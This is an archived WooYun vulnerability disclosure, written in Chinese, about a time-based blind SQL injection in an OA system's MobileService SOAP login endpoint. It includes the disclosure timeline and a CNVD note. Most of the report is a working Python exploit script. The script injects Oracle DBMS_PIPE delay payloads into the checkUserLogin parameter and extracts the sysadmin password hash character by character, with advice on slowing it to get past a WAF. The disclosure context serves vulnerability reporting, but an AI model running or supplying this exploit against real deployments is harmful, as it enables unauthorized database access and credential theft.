乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-19: 细节已通知厂商并且等待厂商处理中 2016-04-22: 厂商已经确认,细节仅向厂商公开 2016-05-02: 细节向核心白帽子及相关领域专家公开 2016-05-12: 细节向普通白帽子公开 2016-05-22: 细节向实习白帽子公开 2016-06-06: 细节向公众公开
**.**.**.**/login/Login.jsp?logintype=1详情参考:http://**.**.**.**/bugs/wooyun-2016-0169453可获取数据库中的任意信息,因为有waf,网速很好的情况,可能需要自己添加延迟,我这是龟速,所以不需要。写了个验证脚本:
#!/usr/bin/python# -*- coding: utf-8 -*-import requestsimport urlparseimport time#oracledef Injection_exp(url): domain = urlparse.urlparse(url)[1] postURL = url + '/services/MobileService' headers = {'Content-Type': 'text/xml', 'SOAPAction': '""', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0' } dic='0123456789ABCDEF' md5 = "" for i in range(1,33): for j in dic: data = '''<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" ''' data += '''xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:xsd="http://**.**.**.**/1999/XMLSchema" ''' data += '''xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance" xmlns:m0="http://**.**.**.**/" ''' data += '''xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="**.**.**.**" ''' data += '''xmlns:urn2="http://workflow.webservices.mobile.weaver"> ''' data += ''' <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:checkUserLogin> <urn:in0>1' AND 8888=(CASE WHEN (ASCII(SUBSTR((SELECT password FROM hrmresourcemanager where loginid ='sysadmin'),%d,1))=%s) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(65)||CHR(72)||CHR(117),5) ELSE 8888 END) AND 'qcNr'='qcNr</urn:in0> <urn:in1>1</urn:in1> <urn:in2>1</urn:in2> </urn:checkUserLogin> </SOAP-ENV:Body></SOAP-ENV:Envelope>''' % (i, ord(j)) try: req = requests.post(postURL, headers = headers, data = data) #响应时间 res_time = req.elapsed.total_seconds() #print res_time if res_time > 6: md5 += j print md5 break except: pass#select password from hrmresoucemanager where loginid='sysadmin'url = "**.**.**.**"Injection_exp(url)print 'done!'
该脚本是从数据库中获取sysadmin的密码。
危害等级:中
漏洞Rank:10
确认时间:2016-04-22 16:48
CNVD未复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无